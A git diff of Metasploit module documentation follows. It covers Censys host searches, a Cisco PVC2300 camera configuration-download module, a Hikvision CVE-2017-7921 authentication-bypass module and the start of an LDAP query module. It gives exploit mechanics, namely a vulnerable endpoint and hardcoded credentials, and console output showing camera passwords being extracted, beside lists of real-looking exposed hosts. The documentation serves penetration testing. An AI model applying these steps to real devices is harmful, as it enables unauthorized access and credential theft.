+retrieve the certificate details for each relevant service by querying the
+Certificates dataset.

 ## Verification Steps

 1. Do: `use auxiliary/gather/censys_search`
-2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
-3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
-4. Do: `set CENSYS_SEARCHTYPE certificates`
-5: Do: `set CENSYS_DORK query`
-6: Do: `run`
+1. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
+1. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
+1. Do: `set CERTIFICATES true` (to get certificates details - optional)
+1. Do: `set QUERY <query>`
+1. Do: `run`

 ## Scenarios

-### Certificates Search
+A single keyword or a domain name can be used. For advanced searches, the Censys Search Language can also be used.
+Here, the following query is used to get the hosts running FTP or Telnet in Germany:
+```
+location.country_code: DE and services.service_name: {"FTP", "Telnet"}
+```
+
+### Without certificates details

 ```
-msf auxiliary(censys_search) > set CENSYS_DORK rapid7
-CENSYS_DORK => rapid7
-msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE certificates
-CENSYS_SEARCHTYPE => certificates
+msf6 auxiliary(gather/censys_search) > run verbose=true QUERY="location.country_code: DE and services.service_name: {"FTP", "Telnet"}" CENSYS_UID=<redacted> CENSYS_SECRET=<redacted>
+
+[+] 2.19.184.189 - 21/FTP,22/SSH,80/HTTP,443/HTTP
+[+] 2.19.184.214 - 21/FTP
+[+] 2.19.184.216 - 21/FTP
+[+] 2.23.14.108 - 21/FTP
+[+] 2.23.14.163 - 21/FTP,449/UNKNOWN,515/UNKNOWN,4101/UNKNOWN,4222/UNKNOWN,44100/UNKNOWN,44104/UNKNOWN,44117/UNKNOWN,44133/UNKNOWN,44156/UNKNOWN,44161/UNKNOWN,44162/UNKNOWN,44170/UNKNOWN,44174/UNKNOWN
+[+] 2.23.14.195 - 21/FTP,45108/UNKNOWN,45110/UNKNOWN,45111/UNKNOWN,45117/UNKNOWN,45149/UNKNOWN,45150/UNKNOWN,45164/UNKNOWN
+[+] 2.23.14.199 - 21/FTP
+[+] 2.23.14.201 - 21/FTP,47106/UNKNOWN,47113/UNKNOWN,47150/UNKNOWN
+[+] 2.23.14.209 - 21/FTP,49100/UNKNOWN,49121/UNKNOWN,49143/UNKNOWN,49152/UNKNOWN
+[+] 2.23.14.212 - 21/FTP
+[+] 2.23.14.218 - 21/FTP
+[+] 2.23.14.235 - 21/FTP
+[+] 2.23.14.243 - 21/FTP
+[+] 2.23.15.71 - 21/FTP,22/SSH,80/HTTP,443/HTTP
+[+] 2.23.15.238 - 21/FTP,80/HTTP,443/HTTP
+[+] 2.56.11.154 - 21/FTP,22/SSH,25/SMTP,53/DNS,80/HTTP,110/POP3,143/IMAP,443/HTTP,465/SMTP,587/SMTP,993/IMAP,2077/HTTP,2078/HTTP,2079/HTTP,2080/HTTP,2082/HTTP,2083/HTTP,2086/HTTP,2087/HTTP,2095/HTTP,2096/HTTP,3306/MYSQL
+[+] 2.56.11.222 - 21/FTP,22/SSH,80/HTTP,111/PORTMAP,137/NETBIOS,443/HTTP,445/SMB
+[+] 2.56.77.123 - 21/FTP,22/SSH,80/HTTP
+[+] 2.56.77.162 - 21/FTP,25/SMTP,80/HTTP,443/HTTP,465/SMTP,587/SMTP,993/IMAP,5022/SSH,8443/HTTP,50080/HTTP
+[+] 2.56.77.185 - 21/FTP,25/SMTP,587/SMTP,1024/HTTP,1723/PPTP,4444/UNKNOWN
+[+] 2.56.77.186 - 21/FTP,25/SMTP,80/HTTP,443/HTTP,465/SMTP,587/SMTP,1024/HTTP,1723/PPTP,4444/UNKNOWN,5060/SIP
+[+] 2.56.77.189 - 21/FTP,25/SMTP,80/HTTP,443/HTTP,465/SMTP,587/SMTP,1024/HTTP,1723/PPTP,4444/HTTP,8080/HTTP,50080/HTTP
 ...
-[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.41 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 64.125.235.5 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.40 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.227.12 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.38 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 23.48.13.195 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.227.14 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.252.134 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.63 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.242 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.187 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.64 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.181 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.17 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.183 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.186 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.41 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 64.125.235.5 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.40 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.227.12 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.38 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 23.48.13.195 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.227.14 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.252.134 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.63 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.242 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.187 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.64 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.181 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.17 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.183 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.186 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.41 - CN=NeXpose Security Console, O=Rapid7
+```
+
+### With certificates details
+
+```
+msf6 auxiliary(gather/censys_search) > run verbose=true QUERY="location.country_code: DE and services.service_name: {"FTP", "Telnet"}" CENSYS_UID=<redacted> CENSYS_SECRET=<redacted> CERTIFICATES=true
+
+[+] 2.19.184.189 - 21/FTP,22/SSH,80/HTTP,443/HTTP
+[*] Certificate for 21/FTP: C=US, ST=California, L=Mountain View, O=Synopsys\, Inc., CN=eft.synopsys.com (Issuer: C=US, O=Entrust\, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust\, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K)
+[*] Certificate for 443/HTTP: C=US, ST=California, L=Mountain View, O=Synopsys\, Inc., CN=eft.synopsys.com (Issuer: C=US, O=Entrust\, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust\, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K)
+[+] 2.19.184.214 - 21/FTP
+[+] 2.19.184.216 - 21/FTP
+[+] 2.23.14.108 - 21/FTP
+[+] 2.23.14.163 - 21/FTP,449/UNKNOWN,515/UNKNOWN,4101/UNKNOWN,4222/UNKNOWN,44100/UNKNOWN,44104/UNKNOWN,44117/UNKNOWN,44133/UNKNOWN,44156/UNKNOWN,44161/UNKNOWN,44162/UNKNOWN,44170/UNKNOWN,44174/UNKNOWN
+[+] 2.23.14.195 - 21/FTP,45108/UNKNOWN,45110/UNKNOWN,45111/UNKNOWN,45117/UNKNOWN,45149/UNKNOWN,45150/UNKNOWN,45164/UNKNOWN
+[+] 2.23.14.199 - 21/FTP
+[+] 2.23.14.201 - 21/FTP,47106/UNKNOWN,47113/UNKNOWN,47150/UNKNOWN
+[+] 2.23.14.209 - 21/FTP,49100/UNKNOWN,49121/UNKNOWN,49143/UNKNOWN,49152/UNKNOWN
+[+] 2.23.14.212 - 21/FTP
+[*] Certificate for 21/FTP: C=US, ST=Vermont, L=Colchester, O=VERMONT INFORMATION PROCESSING\, INC., CN=*.vtinfo.com (Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1)
+[+] 2.23.14.218 - 21/FTP
+[*] Certificate for 21/FTP: C=US, ST=Vermont, L=Colchester, O=VERMONT INFORMATION PROCESSING\, INC., CN=*.vtinfo.com (Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1)
+[+] 2.23.14.235 - 21/FTP
+[+] 2.23.14.243 - 21/FTP
 ...

-```
-
-### IPv4 Search
+msf6 auxiliary(gather/censys_search) > services
+Services
+========

-```
-msf auxiliary(censys_search) > set CENSYS_DORK rapid7
-CENSYS_DORK => rapid7
-msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE ipv4
-CENSYS_SEARCHTYPE => ipv4
-[*] 197.117.5.36 - 443/https
-[*] 208.118.237.81 - 443/https
-[*] 206.19.237.19 - 443/https
-[*] 54.214.49.70 - 80/http,443/https
-[*] 208.118.237.241 - 443/https
-[*] 162.220.246.141 - 443/https,22/ssh,80/http
-[*] 31.214.157.19 - 443/https,22/ssh
-[*] 52.88.1.225 - 443/https,22/ssh
-[*] 208.118.227.12 - 25/smtp
-[*] 38.107.201.41 - 443/https
-[*] 52.44.56.126 - 80/http,443/https
-[*] 52.54.227.6 - 443/https,80/http
-[*] 23.217.253.242 - 443/https,80/http
-[*] 96.6.3.45 - 80/http,443/https
-[*] 23.6.73.47 - 443/https,80/http
-[*] 23.78.99.243 - 80/http,443/https
-[*] 23.53.51.170 - 80/http,443/https
-[*] 23.62.201.47 - 443/https,80/http
-[*] 2.23.50.157 - 443/https,80/http
-[*] 118.215.191.13 - 80/http,443/https
-[*] 2.19.185.28 - 80/http,443/https
-[*] 2.18.195.99 - 443/https,80/http
-[*] 23.197.196.25 - 443/https,80/http
-[*] 95.100.104.181 - 443/https,80/http
-[*] 2.20.37.130 - 80/http,443/https
-[*] 23.194.237.34 - 443/https,80/http
-[*] 2.17.140.86 - 443/https,80/http
-[*] 64.125.235.5 - 25/smtp
-[*] 208.118.227.32 - 80/http
-[*] 2.21.129.149 - 80/http,443/https
-[*] 2.20.167.33 - 80/http,443/https
-[*] 95.100.139.218 - 80/http,443/https
-[*] 23.38.88.202 - 443/https,80/http
-[*] 2.17.184.80 - 443/https,80/http
-[*] 23.59.119.23 - 80/http,443/https
-[*] 2.16.14.225 - 443/https,80/http
-[*] 104.113.122.33 - 443/https,80/http
-[*] 23.223.44.164 - 80/http,443/https
-[*] 88.221.120.214 - 443/https,80/http
-[*] 23.47.36.145 - 443/https,80/http
-[*] 2.23.21.254 - 80/http,443/https
-[*] 208.118.237.39 - 443/https
-[*] 208.118.237.40 - 443/https
-[*] 208.118.237.41 - 443/https
-[*] 23.54.217.47 - 80/http,443/https
-[*] 96.17.254.188 - 443/https,80/http
-[*] 184.25.129.65 - 443/https,80/http
-[*] 104.121.167.123 - 443/https,80/http
-[*] 104.94.110.63 - 443/https,80/http
-[*] 104.91.11.216 - 80/http,443/https
-[*] 23.38.233.47 - 80/http,443/https
-[*] 52.86.110.89 - 80/http,443/https
-[*] 69.192.73.47 - 443/https,80/http
-[*] 184.86.57.47 - 443/https,80/http
-[*] 104.86.45.180 - 443/https,80/http
-[*] 184.87.72.153 - 80/http,443/https
-[*] 23.66.25.47 - 80/http,443/https
-[*] 23.56.162.76 - 80/http,443/https
-[*] 184.87.133.242 - 443/https,80/http
-[*] 23.55.74.28 - 80/http,443/https
-[*] 23.6.225.84 - 80/http,443/https
-[*] 23.46.133.153 - 443/https,80/http
-[*] 23.10.121.47 - 443/https,80/http
-[*] 104.109.35.169 - 80/http,443/https
-[*] 172.227.101.182 - 80/http,443/https
-[*] 184.27.23.104 - 80/http,443/https
-[*] 23.49.185.47 - 80/http,443/https
-[*] 23.67.172.177 - 80/http,443/https
-[*] 23.62.170.161 - 443/https,80/http
-[*] 23.219.71.35 - 443/https,80/http
-[*] 104.82.94.233 - 443/https,80/http
-[*] 184.26.73.47 - 80/http,443/https
-[*] 104.68.108.237 - 80/http,443/https
-[*] 23.60.39.77 - 80/http,443/https
-[*] 23.66.100.92 - 80/http,443/https
-[*] 23.61.28.182 - 443/https,80/http
-[*] 23.42.116.233 - 80/http,443/https
-[*] 104.105.14.197 - 80/http,443/https
-[*] 104.103.203.240 - 80/http,443/https
-[*] 104.65.57.235 - 80/http,443/https
-[*] 23.41.83.224 - 80/http,443/https
-[*] 184.51.185.47 - 80/http,443/https
-[*] 23.67.231.142 - 80/http,443/https
-[*] 208.118.237.38 - 443/https
-[*] 104.76.25.28 - 80/http,443/https
-[*] 23.196.125.176 - 443/https,80/http
-[*] 23.40.154.224 - 80/http,443/https
-[*] 23.77.33.204 - 443/https,80/http
-[*] 104.88.21.48 - 80/http,443/https
-[*] 173.223.134.47 - 80/http,443/https
-[*] 23.4.98.72 - 80/http,443/https
-[*] 23.44.97.3 - 80/http,443/https
-[*] 23.203.66.142 - 443/https,80/http
-[*] 23.42.216.251 - 443/https,80/http
-[*] 23.42.85.25 - 80/http,443/https
-[*] 173.255.195.131 - 80/http,23/telnet,25/smtp,110/pop3,53/dns,443/https,22/ssh
-[*] 104.83.219.182 - 443/https,80/http
-[*] 184.86.41.47 - 443/https,80/http
-[*] 104.97.72.196 - 443/https,80/http
-[*] 69.192.169.48 - 443/https,80/http
-```
-
-### Websites Search
-
-```
-msf auxiliary(censys_search) > set CENSYS_DORK rapid7
-CENSYS_DORK => rapid7
-msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE websites
-CENSYS_SEARCHTYPE => websites
-msf auxiliary(censys_search) > run
-
-[+] rapid7.com - [37743]
-[+] logentries.com - [45346]
-[+] venturefizz.com - [106102]
-[+] gild.com - [116853]
-[+] sectools.org - [122125]
-[+] ericzhang.me - [155622]
-[+] metasploit.com - [156435]
-[+] datapipe.com - [209756]
-[+] routerpwn.com - [317896]
-[+] proxy-base.com - [507954]
-[+] config.fr - [542346]
-[+] winterwyman.com - [629471]
-[+] gogrid.com - [741009]
-[+] wesecure.nl - [997423]
-[*] Auxiliary module execution completed
+host          port   proto  name     state  info
+----          ----   -----  ----     -----  ----
+2.19.184.189  80     tcp    http     open
+2.19.184.189  443    tcp    http     open   C=US, ST=California, L=Mountain View, O=Synopsys\, Inc., CN=eft.synopsys.com (Issuer: C=US, O=Entrust\, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust\, Inc. - for authorized use only, CN=Entrust Certification A
+                                            uthority - L1K)
+2.19.184.189  21     tcp    ftp      open   C=US, ST=California, L=Mountain View, O=Synopsys\, Inc., CN=eft.synopsys.com (Issuer: C=US, O=Entrust\, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust\, Inc. - for authorized use only, CN=Entrust Certification A
+                                            uthority - L1K)
+2.19.184.189  22     tcp    ssh      open
+2.19.184.214  21     tcp    ftp      open
+2.19.184.216  21     tcp    ftp      open
+2.23.14.108   21     tcp    ftp      open
+2.23.14.163   21     tcp    ftp      open
+2.23.14.163   44174  tcp    unknown  open
+2.23.14.163   449    tcp    unknown  open
+2.23.14.163   515    tcp    unknown  open
+2.23.14.163   4101   tcp    unknown  open
+2.23.14.163   4222   tcp    unknown  open
+2.23.14.163   44104  tcp    unknown  open
+2.23.14.163   44100  tcp    unknown  open
+2.23.14.163   44117  tcp    unknown  open
+2.23.14.163   44133  tcp    unknown  open
+2.23.14.163   44156  tcp    unknown  open
+2.23.14.163   44161  tcp    unknown  open
+2.23.14.163   44162  tcp    unknown  open
+2.23.14.163   44170  tcp    unknown  open
+2.23.14.195   45108  tcp    unknown  open
+2.23.14.195   45111  tcp    unknown  open
+2.23.14.195   45164  tcp    unknown  open
+2.23.14.195   45150  tcp    unknown  open
+2.23.14.195   45149  tcp    unknown  open
+2.23.14.195   21     tcp    ftp      open
+2.23.14.195   45117  tcp    unknown  open
+2.23.14.195   45110  tcp    unknown  open
+2.23.14.199   21     tcp    ftp      open
+2.23.14.201   47113  tcp    unknown  open
+2.23.14.201   21     tcp    ftp      open
+2.23.14.201   47106  tcp    unknown  open
+2.23.14.201   47150  tcp    unknown  open
+2.23.14.209   49100  tcp    unknown  open
+2.23.14.209   21     tcp    ftp      open
+2.23.14.209   49143  tcp    unknown  open
+2.23.14.209   49121  tcp    unknown  open
+2.23.14.209   49152  tcp    unknown  open
+2.23.14.212   21     tcp    ftp      open   C=US, ST=Vermont, L=Colchester, O=VERMONT INFORMATION PROCESSING\, INC., CN=*.vtinfo.com (Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1)
+2.23.14.218   21     tcp    ftp      open   C=US, ST=Vermont, L=Colchester, O=VERMONT INFORMATION PROCESSING\, INC., CN=*.vtinfo.com (Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1)
+2.23.14.235   21     tcp    ftp      open
+2.23.14.243   21     tcp    ftp      open
 ```
@@ -0,0 +1,55 @@
+## Vulnerable Application
+This module exploits an information disclosure vulnerability in Cisco PVC2300 cameras in order to download the configuration file
+containing the admin credentials for the web interface.
+
+The module first performs a basic check to see if the target is likely Cisco PVC2300. If so, the module attempts to obtain a sessionID
+via an HTTP GET request to the vulnerable /oamp/System.xml endpoint using the `login` action and the hardcoded credentials `L1_admin:L1_51`.
+
+If a session ID is obtained, the module uses it in another HTTP GET request to /oamp/System.xml that uses the `downloadConfigurationFile`
+action in an attempt to download the configuration file.
+
+The configuration file, if obtained, will be encdoded using base64 with a non-standard alphabet. In order to decode it,
+the module first translates the encoded configuration file from the default base64 alphabet to the custom alphabet.
+Then the configuration file is decoded using regular base64 and subsequently stored in the `loot` folder.
+
+Finally, the module attempts to extract the admin credentials to the web interface from the decoded configuration file.
+
+No known solution was made available for this vulnerability and no CVE has been published.
+It is therefore likely that most (if not all) Cisco PVC2300 cameras are affected.
+
+This module was successfully tested against several Cisco PVC2300 cameras.
+
+## Options
+No non-default options are configured.
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/gather/cisco_pvc2300_download_config`
+3. Do: `set RHOSTS [IP]`
+4. Do: `run`
+
+## Scenarios
+### Cisco PVC2300
+```
+Module options (auxiliary/gather/cisco_pvc_2300_info_disclosure):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   172.31.31.233    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+msf6 auxiliary(gather/cisco_pvc_2300_info_disclosure) > run
+[*] Running module against 172.31.31.233
+
+[*] The target may be vulnerable. Obtained sessionID 1122062985
+[+] Successfully downloaded the configuration file
+[*] Saving the full configuration file to /root/.msf4/loot/20220803124629_default_172.31.31.233_ciscopvc.config_489884.txt
+[*] Obtained device name PVC2300 POE Video Camera
+[+] Obtained the following admin credentials for the web interface from the configuration file:
+[*] admin username: admin
+[*] admin password: [obfuscated]
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,167 @@
+## Vulnerable Application
+
+Many Hikvision IP cameras have improper authorization logic that allows unauthenticated information disclosure
+of camera information, such as detailed hardware and software configuration, user credentials, and camera snapshots.
+
+This module allows the attacker to disclose this information without the need of authenticaton by utilizing the
+improper authentication logic to send a request to the server which contains an `auth` parameter in the query string
+containing a Base64 encoded version of the authorization in `username:password` format.
+Vulnerable cameras will ignore the `password` parameter and will instead use the username part of this string
+as the user to log in. Using user `admin` will allow an attacker to retrieve and disclose any information
+of the targeted device.
+
+The vulnerability has been present in Hikvision products since 2014.
+In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.
+
+Below is a list of vulnerable firmware, but many other white-labelled versions might be vulnerable.
+
+* DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
+* DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
+* DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
+* DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414
+* DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421
+* DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928
+* DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106
+
+Installing a vulnerable test bed requires a Hikvision camera with the vulnerable firmware loaded.
+
+## Verification Steps
+
+This module has been tested against a Hikvision camera with the specifications listed below:
+
+* MANUFACTURER: Hikvision.China
+* MODEL: DS-2CD2142FWD-IS
+* FIRMWARE VERSION: V5.4.1
+* FIRMWARE RELEASE: build 160525
+* BOOT VERSION: V1.3.4
+* BOOT RELEASE: 100316
+
+1. `use auxiliary/gather/hikvision_info_disclosure_cve_2017_7921`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `check`
+1. `set PRINT true`
+1. `set ACTION Automatic`
+1. `run`
+1. You should get a full disclosure of all camera information supported by this module.
+
+## Options
+### PRINT
+This option allows you print all information collected to the console during execution except for
+camera snapshots.
+
+## Actions
+### Automatic
+Retrieves all information suported by this module
+### Configuration
+Retrieves the camera hardware and software configuration
+### Credentials
+Retrieves all configured users including the passwords in plain text format and stores them in the database.
+This can be checked by using the command `creds -O <target IP>` at the Metasploit prompt.
+### Snapshot
+Takes a camera snapshot and stores it as a JPEG file in loot.
+
+All information disclosed is by default stored in loot
+
+## Scenarios
+
+### Hikvision Camera DS-2CD2142FWD-IS -> firmware version V5.4.1, build 160525
+
+```
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set ACTION Automatic
+ACTION => Automatic
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set PRINT true
+PRINT => true
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > options
+
+Module options (auxiliary/gather/hikvision_info_disclosure_cve_2017_7921):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   PRINT    true             no        Print output to console (not applicable for snapshot)
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.100.180  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Auxiliary action:
+
+   Name       Description
+   ----       -----------
+   Automatic  Dump all information
+
+
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > check
+[+] 192.168.100.180:80 - The target is vulnerable.
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > run
+[*] Running module against 192.168.100.180
+
+[*] Running in automatic mode
+[*] Getting the user credentials...
+[*] Credentials for user:admin are added to the database...
+[*] Credentials for user:admln are added to the database...
+[*] User Credentials Information:
+-----------------------------
+Username:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
+Username:admln | ID:2 | Role:Operator | Password: asdf1234
+
+[+] User credentials are successfully saved to /root/.msf4/loot/20221002172346_default_192.168.100.180_hikvision.creden_049224.txt
+[*] Getting the camera hardware and software configuration...
+[*] Camera Device Information:
+--------------------------
+Device name: IP CAMERA
+Device ID: 88
+Device description: IPCamera
+Device manufacturer: Hikvision.China
+Device model: DS-2CD2142FWD-IS
+Device S/N: DS-2CD2142FWD-IS2016HS77777777777
+Device MAC: bc:ad:28:ff:ff:ff
+Device firware version: V5.4.1
+Device firmware release: build 160525
+Device boot version: V1.3.4
+Device boot release: 100316
+Device hardware version: 0x0
+
+Camera Network Information:
+---------------------------
+IP interface: 1
+IP version: v4
+IP assignment: static
+IP address: 192.168.100.180
+IP subnet mask: 255.255.255.0
+Default gateway: 192.168.100.1
+Primary DNS: 8.8.8.8
+
+Camera Storage Information:
+---------------------------
+Storage volume name: HDD1
+Storage volume ID: 1
+Storage volume description: DAS
+Storage device: HDD
+Storage type: internal
+Storage capacity (MB): 30543
+Storage device status: HD_NORMAL
+
+[+] Camera configuration details are successfully saved to /root/.msf4/loot/20221002172347_default_192.168.100.180_hikvision.config_549113.txt
+[*] Taking a camera snapshot...
+[+] Camera snapshot is successfully saved to /root/.msf4/loot/20221002172348_default_192.168.100.180_hikvision.image_963468.bin
+[*] Auxiliary module execution completed
+
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > creds -O 192.168.100.180
+Credentials
+===========
+
+host             origin           service        public  private   realm  private_type  JtR Format
+----             ------           -------        ------  -------   -----  ------------  ----------
+192.168.100.180  192.168.100.180  80/tcp (http)  admln   asdf1234         Password
+192.168.100.180  192.168.100.180  80/tcp (http)  admin   Pa$$W0rd         Password
+
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) >
+```
+
+## Limitations
+No limitations are identified so far using this module.
@@ -0,0 +1,598 @@
+## Vulnerable Application
+This module allows users to query an LDAP server using either a custom LDAP query, or
+a set of LDAP queries under a specific category. Users can also specify a JSON or YAML
+file containing custom queries to be executed using the `RUN_QUERY_FILE` action.
+If this action is specified, then `QUERY_FILE_PATH` must be a path to the location
+of this JSON/YAML file on disk.
+
+Users can also run a single query by using the `RUN_SINGLE_QUERY` option and then setting
+the `QUERY_FILTER` datastore option to the filter to send to the LDAP server and `QUERY_ATTRIBUTES`
+to a comma seperated string containing the list of attributes they are interested in obtaining
+from the results.
+
+As a third option can run one of several predefined queries by setting `ACTION` to the
+appropriate value. These options will be loaded from the `ldap_queries_default.yaml` file
+located in the MSF configuration directory, located by default at `~/.msf4/ldap_queries_default.yaml`.
+
+Note that you can override the default query settings in this way by defining a query with an
+action name that is the same as one of existing actions in the file at
+`data/auxiliary/gather/ldap_query/ldap_queries_default.yaml`. This will however prevent any updates
+for that action that may be made to the `data/auxiliary/gather/ldap_query/ldap_queries_default.yaml`
+file, which may occur as part of Metasploit updates/upgrades, from being used though, so keep this
+in mind when using the `~/.msf4/ldap_queries_default.yaml` file.
+
+All results will be returned to the user in table, CSV or JSON format, depending on the value
+of the `OUTPUT_FORMAT` datastore option. The characters `||` will be used as a delimiter
+should multiple items exist within a single column.
+
+## Verification Steps
+
+1. Do: `use auxiliary/gather/ldap_query`
+2. Do: `set ACTION <target action>`
+3. Do: `set RHOSTS <target IP(s)>`
+4. Optional: `set RPORT <target port>` if target port is non-default.
+5: Optional: `set SSL true` if the target port is SSL enabled.
+6: Do: `run`
+
+## Options
+
+### OUTPUT_FORMAT
